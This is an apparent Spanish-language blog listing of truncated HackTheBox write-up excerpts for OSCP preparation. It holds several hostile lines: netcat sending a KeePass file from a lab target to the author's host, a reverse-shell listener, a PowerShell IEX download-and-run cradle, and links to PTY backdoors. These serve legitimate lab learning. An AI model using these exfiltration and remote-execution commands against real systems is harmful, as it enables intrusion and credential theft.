by Ric | Oct 28, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un nmap. Esta maquina fue muy interesante porque se juntaron demasiadas vulnerabilidades y configuraciones extrañas como port knocking. root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43 Starting Nmap 7.70 ( https://nmap.org ) at...
by Ric | Oct 27, 2019 | Blog, OSCP
Como siempre empezamos con NMAP root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-27 14:04 CET Nmap scan report for 10.10.10.24 Host is up (0.031s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp...
by Ric | Oct 27, 2019 | Blog, Herramientas / tools, OSCP
Hay algunas veces que la shell que tenemos esta muy limitada y no podemos hacer cosas como usar las flechitas, no hay tab ni su. Ahora como arreglarlo? Si la maquina tiene python es sencillo root@Kali2:~/Desktop# nc -lvnp 1234 listening on [any] 1234 … connect...
by Ric | Oct 26, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de las boxes más complejas que he hecho. Sobretodo porque no tengo tanta experiencia en windows. Como siempre empezamos con un Nmap root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST...
by Ric | Oct 22, 2019 | Blog, Herramientas / tools, OSCP
Como siempre comenzamos con un nmap pero no hay mucho 80 y 443. Como es una web application corremos dirbuster. En este caso con una extension que no uso normalmente txt. Eso encuentra el archivo https://10.10.10.60/system-users.txt ####Support ticket### Please create...
by Ric | Oct 21, 2019 | Blog, Herramientas / tools, OSCP
Este ya lo había hecho pero usando metasploit. Una vez descubrimos la version de Nibbleblog podemos encontrar la vulnerabilidad en internet. En resumen, podemos subir imagenes sin filtros de tipo. Por lo que podemos subir un PHP sin problema. Lo que es más interesante...
by Ric | Oct 21, 2019 | Blog, OSCP
Esta fue una maquina interensante pero estuvo muy fácil y sin MSF 🙂 Empezamos con un nmap (sparta) Como solo había un webserver use dirbuster medium. Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / – 200 Dir found:...
by Ric | Oct 20, 2019 | Blog, Herramientas / tools, OSCP
Es el mejor invento del año. Agarraron la descripción de todos los videos de IppSec y los indexaron. Por ejemplo, si te encuentras kdbx y no sabes que es puedes verlo en videos. Lo mejor es que los links te llevan diréctamnete a ellos. https://ippsec.rocks...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Lo transferimos de windows a linux con: C:\Users\Administrator\.jenkins\workspace\a>nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx nc.exe -w 3 10.10.14.9 1235 < \Users\kohsuke\Documents\CEH.kdbx Lo recibimos con root@Kali2:~/Downloads# nc -lp...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Como siempre empezamos con un NMAP, lo más obvio raro es el puerto 5000 Jenkins. Nmap scan report for 10.10.10.63 Host is up (0.16s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)...
by Ric | Oct 19, 2019 | Blog, Herramientas / tools, OSCP
Esta ha sido una de mis maquinas favoritas. Aprendí mucho y estuvo muy interesante. Como siempre empezamos con un Nmap rápido root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.51 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 16:12 CEST Nmap scan report for...
by Ric | Oct 19, 2019 | Blog, OSCP
Se puede usar SPARTA? Watson? Sherlock? priv escalation de empire?
by Ric | Oct 17, 2019 | Blog, OSCP
Como siempre empezamos con un NMAP root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.15 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-18 14:24 CEST Nmap scan report for 10.10.10.15 Host is up (0.022s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION...
by Ric | Oct 16, 2019 | Blog, Herramientas / tools, OSCP
Empezamos como siempre con NMAP root@Kali2:~/Downloads# nmap -sC -sV 10.10.10.9 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-16 09:59 CEST Nmap scan report for 10.10.10.9 Host is up (0.018s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION...
by Ric | Oct 15, 2019 | Blog, OSCP
Esta es la segunda vez que hackeo BEEP de HTB pero como ya lo hice sin MSF ahora lo hare con MSF. Con NMAP podemos ver: host port proto name state info —- —- —– —- —– —- 10.10.10.7 22 tcp ssh open OpenSSH 4.3 protocol...
by Ric | Oct 15, 2019 | Blog, OSCP
Después de un rato volví a hack the box, mi plan es hacer 26 boxes de preferencia sin metasploit (MSF) u otras herramientas automáticas antes de mi curso de OSCP para estar listo. Hoy empecé con Lame, ya la había hecho hace mucho pero había usado MSF. Como siempre...
by Ric | Oct 14, 2019 | Blog, OSCP
Mi lista de pendientes antes de hacer el OSCP en HTB, lo bueno es que ya hice algunas. # Nombre Dificultad Ya la habias hecho Hechas a partir de ahora? 1 Lame 2.7 Si Sin MSF 2 Beep 3.8 sin MSF Con MSF 3 Bastard 4.9 no Sin MSF 4 Grandpa 3.6 con MSF 5 Granny 3.5 no Con...
by Ric | Oct 11, 2019 | Blog, Herramientas / tools, OSCP
Algunas veces hay procesos automáticos que puedes modificar para lograr un priv-escalation. Por ejemplo en Solidstate de HackTheBox podemos ver que tenemos opcion de escribir en un archivo que es root pero no ejecutarlo. Tenemos la teoría que se ejecutar...
by Ric | Oct 6, 2019 | Blog, Herramientas / tools, OSCP
Nota, si es windows 10 puedes usar watson ja… Lo que estoy haciendo es activar la función: function Find-AllVulns { if ( !$Global:ExploitTable ) { $null = New-ExploitTable } Find-MS10015 Find-MS10092 Find-MS13053 Find-MS13081 Find-MS14058 Find-MS15051...
by Ric | Oct 5, 2019 | Blog, Herramientas / tools, OSCP
PowerUpAllchecks En general lo que estoy haciendo es usar la función: function Invoke-AllChecks { <# .SYNOPSIS Runs all functions that check for various Windows privilege escalation opportunities. powershell.exe IEX(New-Object...
by Ric | Sep 28, 2019 | Blog, Herramientas / tools, OSCP
Para el OSCP no puedes usar herramientas automáticas como Burp Pro, o escaners como Nexpose, Tenable, etc. Tampoco te dicen claramente que usar. Hay una lista de recursos recomendados por los que ya pasaron que puede servir de guia. Fue originalmente publicado en...
by Ric | Aug 10, 2019 | Herramientas / tools, OSCP
Como siempre es una herramienta open source, y actualizada AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. https://github.com/Tib3rius/AutoRecon 891 forks. 5,252 stars. 49 open issues. Recent commits: Update...
by Ric | Jun 1, 2018 | Blog, OSCP
Ok, esta es mi segunda live box. No podré publicar lo que encuentre pero hoy es 1/06/2018 1 Probe Tiene al menos 3 puertos abiertos y una foto gigante del logo de hearbleed, así que empezaremos por ahí mientras corre el scanner completo. msf > search heartbleed...
by Ric | May 30, 2018 | Herramientas / tools, OSCP
Python PTY backdoors – full PTY or nothing! https://github.com/infodox/python-pty-shells 213 forks. 742 stars. 2 open issues. Recent commits: Update tcp_pty_backconnect.py, Darren Martyn Update sctp_pty_bind.py, Darren Martyn Update sctp_pty_backconnect.py,...
by Ric | May 30, 2018 | Blog, Herramientas / tools, OSCP
Está es mi primer box con dificultad media. 1 probe. Del nombre popcorn al principio no encontre nada pero despues de usar dirbuster con la lista chica (creo) sin recursive porque si no se hace eterno encontre una carpeta que se llama torrent. Supuse que necesitas...